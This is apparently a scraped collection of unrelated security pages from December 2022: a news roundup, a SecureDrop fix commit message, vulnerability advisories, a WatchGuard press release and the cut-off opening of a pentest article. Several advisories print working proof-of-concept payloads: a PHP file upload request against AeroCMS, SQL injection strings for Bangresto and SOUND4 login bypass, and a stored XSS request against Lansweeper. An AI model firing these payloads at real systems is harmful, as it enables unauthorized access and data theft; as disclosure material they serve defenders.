Your fortnightly rundown of AppSec vulnerabilities, new hacking techniques, and other cybersecurity news

John Leyden 16 December 2022 at 17:43 UTC

Your fortnightly rundown of AppSec vulnerabilities, new hacking techniques, and other cybersecurity news

Our second web security roundup begins with news that a brace of network security flaws in products from Fortinet and Citrix have each come under active attack.

These attacks were respectively enabled by memory corruption vulnerabilities in the FortiOS SSL-VPN as well as a critical arbitrary code execution risk in Citrix ADC and Citrix Gateway (CVE-2022-27518). It’s unclear whether these assaults are linked, but their occurrence can still be said to underline the importance of patching SSL VPN devices, which have previously been vectors for pushing ransomware onto enterprise networks, among other attacks.

Uber this week suffered a data breach as a result of a cybersecurity incident at a third-party vendor, resulting in the exposure of employees’ personal information. The incident represents only the latest security breach to impact the ride-hailing app firm, which was previously faulted for the delayed disclosure of a 2016 breach that exposed the account records of customers and drivers. More recently, back in September, Uber’s internal IT systems were breached by a social engineering attack.

Over at Black Hat Europe, security researcher Nitesh Dhanjani discussed the impact of floor prices of non-fungible token (NFT) collections and how attacks focused on business dynamics have the potential to wreak havoc on marketplaces. Dhanjani also spoke about off-chain and on-chain sync algorithms, and how the disparities between the two blockchain-related environments can be abused.

I also attended the event for The Daily Swig, reporting on a keynote in which security researcher Daniel Cuthbert said the industry’s fixation on zero-day vulnerabilities was only a partial solution to making the internet fundamentally secure. We also covered some of the top hacking tools from the event.

Among other stories on The Daily Swig in recent days was an Akamai WAF bypass via Spring Boot, SQL injection payloads being smuggled past WAFs, and a crypto maintainer rejecting a bogus cryptocurrency ‘vulnerability’ submitted with the help of ChatGPT.

Here are some other web security stories and other cybersecurity news that caught our attention in the last fortnight:

**Web vulnerabilities**

*   Apache CXF / Critical / SSRF (server-side request forgery) vulnerability in parsing the href attribute of XOP / Disclosed with patch, December 13
*   Grails Spring Security Core plugin / CVE-2022-41923 / Critical / “Vulnerability allows an attacker access to one endpoint (i.e. the targeted endpoint) using the authorization requirements of a different endpoint” / Disclosed with patch, November 22
*   Microsoft .NET / CVE-2022-41089 / Critical / “Malicious actor could cause a user to run arbitrary code as a result of parsing maliciously crafted xps files” / Disclosed with a patch, December 13
*   Ping / CVE-2022-23093 / Memory-handling vulnerability involving networking protocol implementation by FreeBSD prompted its developers to test their own software, which unearthed a flaw in OpenBSD’s implementation of Ping that dates back to software changes introduced 24 years ago
*   Planet eStream / Critical / Vulnerabilities in video platform geared towards online learning enable attackers to take over user accounts with administrative privileges and execute arbitrary JavaScript code, among other attacks / Vendor has released software updates

**Research and attack techniques**

*   A researcher documented how it’s possible to exploit misconfigurations in cross-origin resource sharing (CORS) – a mechanism to control access to restricted website resources from external domains – to run various attacks. CORS misconfiguration issues have historically been downplayed but can seemingly be exploited to bypass CSRF protections or run cross-site tracking (XST) attacks.
*   Lightspin uncovered a serious flaw in an AWS-hosted service that allows software developers to find and share public container images. Attackers could potentially delete all images in the AWS Elastic Container Registry (ECR) Public Gallery or update image contents to inject malicious code, prompting AWS to resolve the problem within a day of its disclosure.
*   A series of flaws in three popular applications that allows an Android device to be used as a remote keyboard and mouse were exposed by Synopsys Cybersecurity Research Center (CyRC) The authentication, authorization, and insecure communication flaws potentially opened up attacks including keystroke sniffing.
*   Supposedly ‘air-gapped’ networks without direct access to the internet often require DNS services in order to resolve a company’s internal DNS records – a weakness potential hackers might be able to exploit, as a blog post by Pentera explains.
*   SALT Labs used a LEGO\-run site as a testbed to illustrate the general risk posed by API security issues. Researchers uncovered a variety of API-related security issues in LEGO’s Brick Lane, including a potential vector to internal production data and systems or manipulating users into surrendering control of their accounts.

LEGO reportedly fixed a number of API security issues found by SALT Labs

**Bug bounty / vulnerability disclosure**

*   HackerOne revealed that cloud-based vulnerabilities account for a growing proportion of vulnerabilities reported by bug bounty hunters, now totalling 65,000 in 2022, a year-on-year rise of 21%.
*   A security researcher who discovered a means to achieve unauthorized access to resumes stored on LinkedIn may have been left underwhelmed by the $5,000 bounty he received for his find, given the potential impact of the issue on users of the Microsoft-owned business-focused social network. An Insecure Direct Object Reference (IDOR) security vulnerability, inadvertently introduced in October 2022, could have allowed recruiters and perhaps more unsavoury parties to download resumes without permission.
*   Swedish video surveillance giant Axis Communications has launched a private bug bounty program with Bugcrowd.

**New open source infosec/hacking tools**

*   Node Security Shield – a defensive tool that takes an allow-listing approach to protecting zero-day protection for NodeJS applications. The tool was inspired by the infamous Log4Shell vulnerability, a zero-day vulnerability in Log4j, a popular Java logging framework.
*   Invoke-DNSteal – allows pen testers to perform file transfers using the DNS protocol as a covert communications channel.
*   Kubeshark – API Traffic Viewer for Kubernetes, providing “deep visibility and monitoring of all API traffic and payloads going in, out and across containers and pods inside a Kubernetes cluster”

**For devs**

*   Google has announced a free-of-charge scanner that allows open source developers to check their software projects for vulnerable dependencies. The tool – called OSV-Scanner – builds on Google’s work in developing an open source vulnerability database.
*   OWASP, best known for its ‘Top 10 Web Application Security Risks’ framework, is backing the creation of a similar scheme to index classes of security risks in the world of AppSec and DevSecOps. The Top 10 CI/CD Security Risks taxonomy aims to catalogue risks in the CI/CD pipeline. “Insufficient Flow Control Mechanisms” topped the nascent list.
*   The SHA-1 cryptographic algorithm, in use since 1995, has reached the end of its useful life, announced the National Institute of Standards and Technology (NIST), which says the federal government should phase out its use by 2030.
*   Research from Endor Labs found that the vast majority (95%) of all vulnerabilities are “found in transitive dependencies – open source code packages that are not selected by developers, but indirectly pulled into projects”.

**For fun**

ChatGPT – the artificial intelligence chat tool from OpenAI – is the hottest thing in infosec-focused social media circles just now. Rather than suggesting possible vulnerabilities in code we wondered what ChatGPT could conjure when asked to write lyrics for a song about SQL injection in the style of the late David Bowie.

The results were more than satisfactory:

In the realm of computers, where data flows like a stream  
There are those that seek to exploit and cause us all to scream  
They are the hackers, the codebreakers, the malicious ones  
And among their favorite trick is the art of SQL injection

Chorus:

SQL injection, SQL injection  
A dangerous game, a digital infection  
SQL injection, SQL injection  
Beware of the hackers and their devious invention

To paraphrase the great man himself, I still don’t know what I was waiting for... but it definitely wasn’t this.

RECOMMENDED Black Hat Europe 2022: A defendable internet is possible, but only with industry makeover

Deserialized web security roundup – Fortinet, Citrix bugs; another Uber breach; hacking NFTs at Black Hat 

A vulnerability was found in Freedom of the Press SecureDrop. It has been rated as critical. Affected by this issue is some unknown functionality of the file gpg-agent.conf. The manipulation leads to symlink following. Local access is required to approach this attack. The name of the patch is b0526a06f8ca713cce74b63e00d3730618d89691. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-215972.

/var/www/securedrop is now root-owned but world readable. This ensures
that code can only be added/modified/removed by root, not www-data.

The package already installs files /var/www/securedrop with the correct
permissions, we were just clobbering it in the postinst, which is now
removed. We have an explicit chmod to adjust directory permissions.

We need special handling for config.py since it is installed by ansible
instead of the package. Since it contains secrets, we want it to be
only-readable by root/www-data and no one else.

The custom\_logo.png is writable by www-data so administrators can change
the logo from the web interface. In the future this could be moved
somewhere else. The file may not exist yet (fresh installs), so we create
it if necessary.

testinfra checks have been updated with the new permissions and took the
time to de-duplicate the list of app directories in 7 different yaml files.

An attacker with access to www-data could have gpg-agent.conf be a
symlink to a root-owned file (e.g. /etc/passwd) and trick the postinst
into clobbering that file as root. Because the content is fixed, it's
pretty low risk but straightforward to fix.

\* Add a postinst snippet to migrate the root crontab over to www-data
  on upgrade.
\* Modify ansible task to install cron jobs for www-data on new installs
\* Update testinfra checks to look at the www-data cron for the tmp
  cleaning job and verify that root's crontab is empty.

There's no need for us to run this as root, all the files alembic needs
to touch (primarily the SQLite database) are writable by www-data. We
specifically run the backup copying and deletion steps as www-data too
so symlink attacks can't be used to have root clobber other files.

For \`mod\_wsgi-express module-config\`, we ship the generated file in the
package itself. In a future (non-hotfix) release we will generate the
file at build-time instead of hardcoding it.

CVE-2022-4563: Apply 2.5.1 fixes to develop by legoktm · Pull Request #6704 · freedomofpress/securedrop

In AeroCms v0.0.1, there is an arbitrary file upload vulnerability at /admin/posts.php?source=edit_post , through which we can upload webshell and control the web server.

*   Description

In AeroCms v0.0.1, an arbitrary file upload vulnerability at /admin/posts.php?source=edit\_post , through which we can upload webshell and control the web server.

*   Step to Reproduct

1.  Login to **admin panel** -> **Posts** -> **View All Posts** -> **Edit**  
    
2.  when jump to the post edit page, and you can see that the function of uploading pictures exists. upload malicious file phpinfo.php  
    
3.  When upload success access '/images/phpinfo.php', the file was successfully uploaded and executed  
    

*   Vulnerable Code

No file checking before uploading in **edit\_post.php** file  

*   POC

\`POST /AeroCMS/admin/posts.php?source=edit\_post&p\_id=3 HTTP/1.1  
Host: 192.168.111.169  
Content-Length: 991  
Cache-Control: max-age=0  
Upgrade-Insecure-Requests: 1  
Origin: http://192.168.111.169  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryi7wHcLADqqvNM4nO  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,_/_;q=0.8,application/signed-exchange;v=b3;q=0.9  
Referer: http://192.168.111.169/AeroCMS/admin/posts.php?source=edit\_post&p\_id=3  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9  
Cookie: PHPSESSID=2m17ikpogrvubj8l2687hc3n45  
Connection: close

\------WebKitFormBoundaryi7wHcLADqqvNM4nO  
Content-Disposition: form-data; name="post\_title"

mysql  
\------WebKitFormBoundaryi7wHcLADqqvNM4nO  
Content-Disposition: form-data; name="post\_category\_id"

1  
\------WebKitFormBoundaryi7wHcLADqqvNM4nO  
Content-Disposition: form-data; name="post\_user"

admin  
\------WebKitFormBoundaryi7wHcLADqqvNM4nO  
Content-Disposition: form-data; name="post\_status"

draft  
\------WebKitFormBoundaryi7wHcLADqqvNM4nO  
Content-Disposition: form-data; name="image"; filename="phpinfo.php"  
Content-Type: application/octet-stream

\------WebKitFormBoundaryi7wHcLADqqvNM4nO  
Content-Disposition: form-data; name="post\_tags"

mysql, database  
\------WebKitFormBoundaryi7wHcLADqqvNM4nO  
Content-Disposition: form-data; name="post\_content"

AeroCMS is created with mysql database.

\------WebKitFormBoundaryi7wHcLADqqvNM4nO Content-Disposition: form-data; name="update\_post"

Edit Post  
\------WebKitFormBoundaryi7wHcLADqqvNM4nO--  
\`

CVE-2022-46135: AeroCMS v0.0.1 Arbitrary File upload vulnerability  · Issue #5 · MegaTKC/AeroCMS

Bangresta version 1.0 suffers from a remote SQL injection vulnerability.

    ## Title: Bangresto 1.0 SQLi## Author: nu11secur1ty## Date: 12.16.2022## Vendor: https://axcora.com/, https://www.hockeycomputindo.com/2021/05/restaurant-pos-source-code-free.html## Demo: https://axcora.my.id/bangrestoapp/start.php## Software: https://github.com/mesinkasir/bangresto## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Bangresto## Description:The `itemID` parameter appears to be vulnerable to SQL injection attacks.The payload ' was submitted in the itemID parameter, and a databaseerror message was returned.The attacker can be stooling all information from the database of thisapplication.## STATUS: CRITICAL Vulnerability[+] Payload:```MySQL---Parameter: itemID (GET)    Type: error-based    Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)    Payload: itemID=(UPDATEXML(2539,CONCAT(0x2e,0x7171767871,(SELECT(ELT(2539=2539,1))),0x7170706a71),2327))&menuID=1---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Bangresto)## Proof and Exploit:[href](https://streamable.com/moapnd)## Time spent`00:30:00`

Bangresta 1.0 SQL Injection

Unauth. SQL Injection vulnerability in Cryptocurrency Widgets Pack Plugin <=1.8.1 on WordPress.

**Solution**

Deactivate and delete. This plugin has been closed as of December 1, 2022 and is not available for download. This closure is temporary, pending a full review.

TomS discovered and reported this SQL Injection vulnerability in WordPress Cryptocurrency Widgets Pack Plugin. This could allow a malicious actor to directly interact with your database, including but not limited to stealing information and creating new administrator accounts. This vulnerability has not been known to be fixed yet.

**No other known vulnerabilities for this plugin**Report

**Report to Patchstack Alliance bounty platform and earn monthly cash prizes.**

Learn more

CVE-2022-44588: WordPress Cryptocurrency Widgets Pack plugin <= 1.8.1 - Unauth. SQL Injection (SQLi) vulnerability - Patchstack

New research also analyzes the commoditization of adversary-in-the-middle attacks, JavaScript obfuscation in exploit kits, and a malware family with Gothic Panda ties.

**SEATTLE – December 15, 2022** **–** WatchGuard® Technologies, a global leader in unified cybersecurity, today released its latest quarterly Internet Security Report, detailing the top malware trends, and network and endpoint security threats analyzed by WatchGuard Threat Lab researchers in Q3 2022. Key findings from the data reveal the quarter’s top malware threat was detected exclusively over encrypted connections, ICS attacks are maintaining popularity, LemonDuck malware is evolving beyond cryptominer delivery, a Minecraft cheat engine is delivering a malicious payload, and much more.“We can’t emphasize enough how important it is for HTTPS inspection to be enabled, even if it requires some tuning and exceptions to do properly. The majority of malware arrives over encrypted HTTPS, and not inspecting it means you’re missing those threats,” said Corey Nachreiner, chief security officer at WatchGuard Technologies. “Rightfully so, the big prizes for attackers like an Exchange server or a SCADA management system deserve extraordinary attention as well this quarter. When a patch is available, it’s important to update immediately, as attackers will eventually benefit from any organization that has yet to implement the latest patch.” 

Other key findings from the Q3 Internet Security Report include:

*   The vast majority of malware arriving over encrypted connections – Although Agent.IIQ placed third in the normal top 10 malware list this quarter, it landed in the #1 spot at the top of the encrypted malware list for Q3. In fact, if you look at the detections for it on both of these lists, you’ll see all Agent.IIQ detections come from encrypted connections. In Q3, if a Firebox was inspecting encrypted traffic, 82% of the malware it detected was through that encrypted connection, leaving only a meager 18% detected without encryption. If you’re not inspecting encrypted traffic on your Firebox, it’s very likely that this average ratio remains true, and you are missing a huge portion of malware. Hopefully, you at least have endpoint protection implemented for a chance to catch it further down the cyber kill chain.

*   ICS and SCADA systems remain trending attack targets – New to the top 10 network attacks list this quarter is a SQL injection-type attack that affected several vendors. One of these companies is Advantech, whose WebAccess portal is used for SCADA systems across a variety of critical infrastructure. Another serious exploit in Q3, which also appeared in the top five network attacks by volume, involved Schneider Electric's U.motion Builder software versions 1.2.1 and prior. This is a stark reminder that attackers aren’t quietly waiting for an opportunity – rather, they are actively seeking system compromise wherever possible.
*   Exchange server vulnerabilities continuing to pose risk – The most recent CVE among the Threat Lab’s new signatures this quarter, CVE-2021-26855, is a Microsoft Exchange Server Remote Code Execution (RCE) vulnerability for on-premises servers. This RCE vulnerability was given a 9.8 CVE score and is known to have been exploited. The date and severity of CVE-2021-26855 should also ring a bell, as it is one of the exploits used by the group HAFNIUM. While most Exchange servers affected by it have likely been patched by now, _most_ does not equate to _all_. Therefore, risks remain.

*   Threat actors targeting seekers of free software – Fugrafa downloads malware that injects malicious code. This quarter, the Threat Lab examined a sample of it that was found in a cheat engine for the popular game Minecraft. While the file shared primarily on Discord claims to be the Minecraft cheat engine Vape V4 Beta, that’s not all it contains. Agent.FZUW has some similarities to Variant.Fugrafa, but instead of installation through a cheat engine, the file itself pretends to have cracked software. The Threat Lab discovered this particular sample has connections with Racoon Stealer, a cryptocurrency hacking campaign used to hijack account information from cryptocurrency exchange services.

*   LemonDuck malware evolving beyond cryptominer delivery – Even with a dip in total blocked or tracked malware domains for the third quarter of 2022, it is easy to see that attacks on unsuspecting users are still high. With three new additions to the top malware domains list – two of which were former LemonDuck malware domains, and the other part of an Emotet classified domain – Q3 saw more malware and attempted malware sites that were newer domains than usual. This trend will change and modify with the landscape of cryptocurrency in turmoil as attackers look for other venues to trick users. Keeping DNS protection enabled is a way to monitor and block unsuspecting users from allowing malware or other serious issues into your organization.

*   JavaScript obfuscation in exploit kits – Signature 1132518, a generic vulnerability for detecting JavaScript Obfuscation attacks against browsers, was the only new addition to the most-widespread network attack signatures list this quarter. JavaScript is a common vector for attacking users and threat actors use JavaScript-based exploit kits all the time – in malvertising, watering hole and phishing attacks, just to name a few. As the defensive fortifications have improved on browsers, so have attackers’ ability to obfuscate malicious JavaScript code.

*   Anatomy of commoditized adversary-in-the-middle attacks – While multi-factor authentication (MFA) is undeniably the single best technology you can deploy to protect against the bulk of authentication attacks, it is not on its own a silver bullet against all attack vectors. Cyber adversaries have made this clear with the rapid rise and commoditization of adversary-in-the-middle (AitM) attacks, and the Threat Lab’s deep dive on EvilProxy, the top security incident of Q3, shows just how malicious actors are beginning to pivot to more sophisticated AitM techniques. Like the Ransomware as a Service offering made popular in recent years, the September 2022 release of an AitM toolkit called EvilProxy has significantly lowered the barrier of entry for what was previously a sophisticated attack technique. From a defensive standpoint, successfully combatting this kind of AitM attack technique requires a mix of both technical tools and user awareness.
*   A malware family with Gothic Panda ties – The Threat Lab’s Q2 2022 report described how Gothic Panda—a state-sponsored threat actor connected to China’s Ministry of State Security—was known to use one of the top malware detections from that quarter. Interestingly, the top encrypted malware list for Q3 includes a malware family called Taidoor, which was not only created by Gothic Panda but has only been seen used by Chinese government cyber actors. While this malware typically focuses on targets in Japan and Taiwan in general, the Generic.Taidoor sample analyzed this quarter was found primarily targeting organizations in France, suggesting that some Fireboxes in this region may have detected and blocked parts of a state-sponsored cyberattack.
*   New ransomware and extortion groups in the wild –Additionally this quarter, the Threat Lab is excited to announce a new, concerted effort to track current ransomware extortion groups and build out its threat intelligence capabilities to provide more ransomware-related information in future reports. LockBit tops the list for Q3 with over 200 public extortions on their dark web page – nearly four times more than that of Basta, the second most prolific ransomware group WatchGuard observed this quarter.WatchGuard’s quarterly research reports are based on anonymized Firebox Feed data from active WatchGuard Fireboxes whose owners have opted to share data in direct support of the Threat Lab’s research efforts. In Q3, WatchGuard blocked a total of more than 17.3 million malware variants (211 per device) and more than 2.3 million network threats (28 per device). The full report includes details on additional malware and network trends from Q3 2022, recommended security strategies, critical defense tips for businesses of all sizes and in any sector, and more.
    
    For a detailed view of WatchGuard’s research, read the complete Q3 2022 Internet Security Report here.
    
    About WatchGuard Technologies, Inc.
    
    WatchGuard® Technologies, Inc. is a global leader in unified cybersecurity. Our Unified Security Platform® approach is uniquely designed for managed service providers to deliver world-class security that increases their business scale and velocity while also improving operational efficiency. Trusted by more than 17,000 security resellers and service providers to protect more than 250,000 customers, the company’s award-winning products and services span network security and intelligence, advanced endpoint protection, multi-factor authentication, and secure Wi-Fi. Together, they offer five critical elements of a security platform: comprehensive security, shared knowledge, clarity & control, operational alignment, and automation. The company is headquartered in Seattle, Washington, with offices throughout North America, Europe, Asia Pacific, and Latin America. To learn more, visit WatchGuard.com.
    

For additional information, promotions and updates, follow WatchGuard on Twitter (@WatchGuard), on Facebook, or on the LinkedIn Company page. Also, visit our InfoSec blog, Secplicity, for real-time information about the latest threats and how to cope with them at www.secplicity.org. 

Subscribe to The 443 – Security Simplified podcast at Secplicity.org, or wherever you find your favorite podcasts.

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

WatchGuard Threat Lab Report Finds Top Threat Arriving Exclusively Over Encrypted Connections

SOUND4 IMPACT/FIRST/PULSE/Eco versions 2.x and below suffer from a username SQL injection vulnerability that allows for authentication bypass.

    SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x (username) Authentication BypassVendor: SOUND4 Ltd.Product web page: https://www.sound4.com | https://www.sound4.bizAffected version: FM/HD Radio Processing:                  Impact/Pulse/First (Version 2: 1.1/2.15)                  Impact/Pulse/First (Version 1: 2.1/1.69)                  Impact/Pulse Eco 1.16                  Voice Processing:                  BigVoice4 1.2                  BigVoice2 1.30                  Web-Audio Streaming:                  Stream 1.1/2.4.29                  Watermarking:                  WM2 (Kantar Media) 1.11Summary: The SOUND4 IMPACT introduces an innovative process - mono andstereo parts of the signal are processed separately to obtain perfectconsistency in terms of both sound and level. Therefore, in movingreception, when the FM receiver switches from stereo to mono and back tostereo, the sound variations and changes in level are reduced by over 90%.In the SOUND4 IMPACT processing chain, the stereo expander can be usedsubstantially without any limitations.With its advanced functionalities and impressive versatility, SOUND4PULSE gives clients the ultimate price - performance ratio, providingmuch more than just a processor. Flexible and powerful, it ensures perfectsound quality and full compatibility with radio broadcasting standardsand can be used simultaneously for FM and HD, DAB, DRM or streaming.SOUND4 FIRST provides all the most important functionalities you needin an FM/HD processor and sets the bar high both in terms of performanceand affordability. Designed to deliver a sound of uncompromising quality,this tool gives you 2-band processing, a digital stereo generator and anIMPACT Clipper.Desc: The application suffers from an SQL Injection vulnerability. Inputpassed through the 'username' POST parameter in 'index.php' is not properlysanitised before being returned to the user or used in SQL queries. Thiscan be exploited to manipulate SQL queries by injecting arbitrary SQL codeand bypass the authentication mechanism.Tested on: Apache/2.4.25 (Unix)           OpenSSL/1.0.2k           PHP/7.1.1           GNU/Linux 5.10.43 (armv7l)           GNU/Linux 4.9.228 (armv7l)Vulnerability discovered by Gjoko 'LiquidWorm' KrsticMacedonian Information Security Research and Development LaboratoryZero Science Lab - https://www.zeroscience.mk - @zeroscienceAdvisory ID: ZSL-2022-5727Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5727.php26.09.2022--POST /index.php HTTP/1.1username='+joxy--+z&password=05C13NCE

SOUND4 IMPACT/FIRST/PULSE/Eco 2.x username SQL Injection

SOUND4 IMPACT/FIRST/PULSE/Eco versions 2.x and below suffer from a password SQL injection vulnerability that allows for authentication bypass.

    SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x (password) Authentication BypassVendor: SOUND4 Ltd.Product web page: https://www.sound4.com | https://www.sound4.bizAffected version: FM/HD Radio Processing:                  Impact/Pulse/First (Version 2: 1.1/2.15)                  Impact/Pulse/First (Version 1: 2.1/1.69)                  Impact/Pulse Eco 1.16                  Voice Processing:                  BigVoice4 1.2                  BigVoice2 1.30                  Web-Audio Streaming:                  Stream 1.1/2.4.29                  Watermarking:                  WM2 (Kantar Media) 1.11Summary: The SOUND4 IMPACT introduces an innovative process - mono andstereo parts of the signal are processed separately to obtain perfectconsistency in terms of both sound and level. Therefore, in movingreception, when the FM receiver switches from stereo to mono and back tostereo, the sound variations and changes in level are reduced by over 90%.In the SOUND4 IMPACT processing chain, the stereo expander can be usedsubstantially without any limitations.With its advanced functionalities and impressive versatility, SOUND4PULSE gives clients the ultimate price - performance ratio, providingmuch more than just a processor. Flexible and powerful, it ensures perfectsound quality and full compatibility with radio broadcasting standardsand can be used simultaneously for FM and HD, DAB, DRM or streaming.SOUND4 FIRST provides all the most important functionalities you needin an FM/HD processor and sets the bar high both in terms of performanceand affordability. Designed to deliver a sound of uncompromising quality,this tool gives you 2-band processing, a digital stereo generator and anIMPACT Clipper.Desc: The application suffers from an SQL Injection vulnerability. Inputpassed through the 'password' POST parameter in 'index.php' is not properlysanitised before being returned to the user or used in SQL queries. Thiscan be exploited to manipulate SQL queries by injecting arbitrary SQL codeand bypass the authentication mechanism.Tested on: Apache/2.4.25 (Unix)           OpenSSL/1.0.2k           PHP/7.1.1           GNU/Linux 5.10.43 (armv7l)           GNU/Linux 4.9.228 (armv7l)Vulnerability discovered by Gjoko 'LiquidWorm' KrsticMacedonian Information Security Research and Development LaboratoryZero Science Lab - https://www.zeroscience.mk - @zeroscienceAdvisory ID: ZSL-2022-5726Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5726.php26.09.2022--POST /index.php HTTP/1.1username=t00t&password='+joxy--+z

SOUND4 IMPACT/FIRST/PULSE/Eco 2.x password SQL Injection

A stored cross-site scripting vulnerability exists in the HdConfigActions.aspx altertextlanguages functionality of Lansweeper lansweeper 10.1.1.0. A specially-crafted HTTP request can lead to arbitrary Javascript code injection. An attacker can send an HTTP request to trigger this vulnerability.

**SUMMARY**

A stored cross-site scripting vulnerability exists in the HdConfigActions.aspx altertextlanguages functionality of Lansweeper lansweeper 10.1.1.0. A specially-crafted HTTP request can lead to arbitrary Javascript code injection. An attacker can send an HTTP request to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Lansweeper lansweeper 10.1.1.0

**PRODUCT URLS**

lansweeper - https://www.lansweeper.com/

**CVSSv3 SCORE**

9.1 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

**CWE**

CWE-80 - Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)

**DETAILS**

Lansweeper is an IT Asset Management solution that gathers hardware and software information of computers and other devices on a computer network for management, compliance and audit purposes.

An exploitable stored xss vulnerability is related with an action: Configuration -> News page->Alter language data choose any language other than english. Vulnerable code is located inside the \LS\CF\HdConfigActions.cs file. Let us take a close look at the vulnerable source code :

    Line 1 	int newsID = int.Parse(current.Request["id"]);
    Line 2 	string reqType = current.Request["type"];
    Line 3 	(...)
    Line 4 		case "news":		
    Line 5 			delteSQL  = "DELETE FROM htblnewsLang WHERE newsid = @p1";
    Line 6 			insertSQL = "INSERT htblnewsLang (newsid, [language], description, [text]) VALUES (@p1,@p2,@p3,@p4)";		
    Line 7 			break;
    Line 8 		(...)
    Line 9 		DB.ExecuteNonQuery(delteSQL, DB.NewDBParameter("@p1", newsID));
    Line 10		foreach (Language langID in Enum.GetValues(typeof(Language)))
    Line 11		{
    Line 12			if (langID != Language.Eng)
    Line 13			{
    Line 14				DB.ExecuteNonQuery(insertSQL, DB.NewDBParameter("@p1", newsID), DB.NewDBParameter("@p2", (int)langID), DB.NewDBParameter("@p3", current.Request["lang" + (int)langID] ?? ""), DB.NewDBParameter("@p4", array[(int)(langID - 1)]), DB.NewDBParameter("@p5", (reqType == "news") ? HtmlSanitizer.SanitizeHtml(dictionary2[langID]) : dictionary2[langID]));
    Line 15			}
    Line 16		}
    

where part of the request looks like this : REQUEST

    POST /configuration/HdConfigActions.aspx?action=altertextlanguages&type=news&id=3 HTTP/1.1
    (...)
    POST DATA:
    lang1=eng_new&lang1x=eng_new_text&lang24=xss_entry&lang24x=<img src=1 onerror=alert(1)>	
    

During the news alter operation, there is a special insert sql query for languages other than english line 12. As you might notice, none of the passed news parameters is sanitized before insertion to the database:

    description  - lang24=xss_entry
    news tesxt   - lang24x=<img src=1 onerror=alert(1)>
    

There is an attempt at sanitization made for paramter 5, but news insert query has just 4 values. News text does not seem to be sanitize during output either. Injected code will be automatically triggered each time when a user attempts to edit this news.

**Exploit Proof of Concept**

REQUEST

    POST /configuration/HdConfigActions.aspx?action=altertextlanguages&type=news&id=3 HTTP/1.1
    Host: 192.168.0.102:81
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
    Accept: */*
    Accept-Language: pl,en-US;q=0.7,en;q=0.3
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 837
    Origin: http://192.168.0.102:81
    Connection: close
    Referer: http://192.168.0.102:81/configuration/MainPage/
    Cookie: UserSettings=language=24; ASP.NET_SessionId=s3bal3hgmqgscqihm3vxj5gt; custauth=username=hacker&userdomain=; __RequestVerificationToken_Lw__=zP2evPOU4gLNF/pF3R1XPsIP7ceImHsHKoqy7GfYwDnIwHnDJKt3r5 0bFTXNS/XpEAiyEFBVT2ekfSLIPgVMULtvi8Ae4qLSYcUO0UH90vcERUKMi72E3I2yEJexWSyNKlA8gcXlfMPYbc0a94Dji44b2cNn4aS0KGOSUQBn/0=
    
    __VIEWSTATE=&lang1=eng_new&lang1x=eng_new_text&lang24=xss_entry&lang24x=<img src=1 onerror=alert(1)>&lang30=Magic&lang30x=<div style="font:12px Arial,Verdana;font-size:12px;font-family:Arial,Verdana;">Some news text<br style=""></div>&lang34=Magic&lang34x=<div style="font:12px Arial,Verdana;font-size:12px;font-family:Arial,Verdana;">Some news text<br style=""></div>&id=3&type=news&undefined=undefined&chksm=6740673596&__RequestVerificationToken=LCEp+vTDGHE23M5WuFdmjkRUlRS/DSdWiI/M7gs3RxuLXvxiMI9MiWihGndb3j1GaSLAhRww0iwriAEMcPmF4AzPEN50y2dmrSH3dUNVM+n0PtKlrw8vFGFigInLwkFYebmGC/fbz0Lo2lx7Myi0Ce2huzL/7QsGyGsj4We5WVg=
    

RESPONSE

    HTTP/1.1 200 OK
    Cache-Control: private
    Content-Type: text/html; charset=utf-8
    Vary: Accept-Encoding
    Server: Microsoft-IIS/8.0
    x-frame-options: SAMEORIGIN
    X-AspNet-Version: 4.0.30319
    X-Powered-By: ASP.NET
    Date: Fri, 03 Jun 2022 09:01:34 GMT
    Connection: close
    Content-Length: 167
    
    {"ErrorType":"","Error":false,"Emsg":"","AddedRows":[["eng_new","",""]],"Columns":[],"Columnwid":[],"Action":"","ReturnValues":{},"ReturnValue":"","ReturnObject":null}
    

**TIMELINE**

2022-06-27 - Vendor Disclosure  
2022-11-29 - Vendor Patch Release  
2022-12-01 - Public Release

Discovered by Marcin 'Icewall' Noga of Cisco Talos.

CVE-2022-28703: TALOS-2022-1532 || Cisco Talos Intelligence Group

Web applications, often in the form of Software as a Service (SaaS), are now the cornerstone for businesses all over the world. SaaS solutions have revolutionized the way they operate and deliver services, and are essential tools in nearly every industry, from finance and banking to healthcare and education. 
Most startup CTOs have an excellent understanding of how to build highly functional

Web applications, often in the form of Software as a Service (SaaS), are now the cornerstone for businesses all over the world. SaaS solutions have revolutionized the way they operate and deliver services, and are essential tools in nearly every industry, from finance and banking to healthcare and education.

Most startup CTOs have an excellent understanding of how to build highly functional SaaS businesses but (as they are not cyber security professionals) need to gain more knowledge of how to secure the web application that underpins it.

**Why test your web applications?**

